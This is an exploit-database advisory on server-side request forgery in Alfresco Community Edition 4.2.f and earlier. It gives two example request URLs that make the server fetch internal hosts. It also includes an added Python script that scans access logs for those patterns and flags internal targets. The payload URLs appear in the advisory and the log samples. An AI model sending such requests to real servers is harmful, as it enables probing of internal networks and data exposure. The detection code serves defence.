Alfresco - '/cmisbrowser?url' Server-Side Request Forgery

EDB-ID: 39259
Platform: Multiple
Date: 2014-07-16


source: https://www.securityfocus.com/bid/68663/info

http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port
 
Alfresco Community Edition is prone to multiple security vulnerabilities.
 
An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions.
 
Alfresco Community Edition 4.2.f and earlier are vulnerable. 

http://www.example.com/alfresco/cmisbrowser?url=http://internal_system:port
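
Requests matching the two URL patterns shown on this page can be looked for in web access logs. The following is an added example, not part of the original advisory: it scans combined-format log lines for the `url` and `endpoint` parameters and flags targets that are private IP literals or internal-looking hostnames. The log lines, the hostname heuristic and the function names are constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Endpoint path -> query parameter that carries the target URL (both taken from the advisory).
WATCHED = {"/alfresco/cmisbrowser": "url", "/alfresco/proxy": "endpoint"}

# Request line inside a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines, not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Jul/2014:10:01:02 +0000] "GET /alfresco/cmisbrowser?url=http://internal_system:8080 HTTP/1.1" 200 512',
    '203.0.113.7 - - [16/Jul/2014:10:01:05 +0000] "GET /alfresco/proxy?endpoint=http%3A%2F%2F10.0.0.5%3A8080 HTTP/1.1" 500 0',
    '198.51.100.9 - - [16/Jul/2014:10:02:00 +0000] "GET /alfresco/cmisbrowser?url=http://cmis.example.org/atom HTTP/1.1" 200 2048',
    '198.51.100.9 - - [16/Jul/2014:10:02:10 +0000] "GET /share/page/ HTTP/1.1" 200 100',
]

def is_internal(host):
    """True for private/loopback/link-local IP literals and internal-looking names."""
    try:
        ip = ipaddress.ip_address(host.strip("[]"))
    except ValueError:
        # Heuristic only: no DNS lookup, so public names that resolve inward are missed.
        return "." not in host or host.endswith((".local", ".internal", ".localhost"))
    return ip.is_private or ip.is_loopback or ip.is_link_local

def find_ssrf_attempts(lines):
    """Return (line number, endpoint path, target host) for each suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        req = urlsplit(m.group(1))
        param = WATCHED.get(req.path.rstrip("/"))
        if param is None:
            continue
        for target in parse_qs(req.query).get(param, []):  # parse_qs percent-decodes values
            host = urlsplit(target).hostname or ""
            if host and is_internal(host):
                hits.append((n, req.path, host))
    return hits

if __name__ == "__main__":
    for hit in find_ssrf_attempts(SAMPLE_LOG):
        print(hit)
```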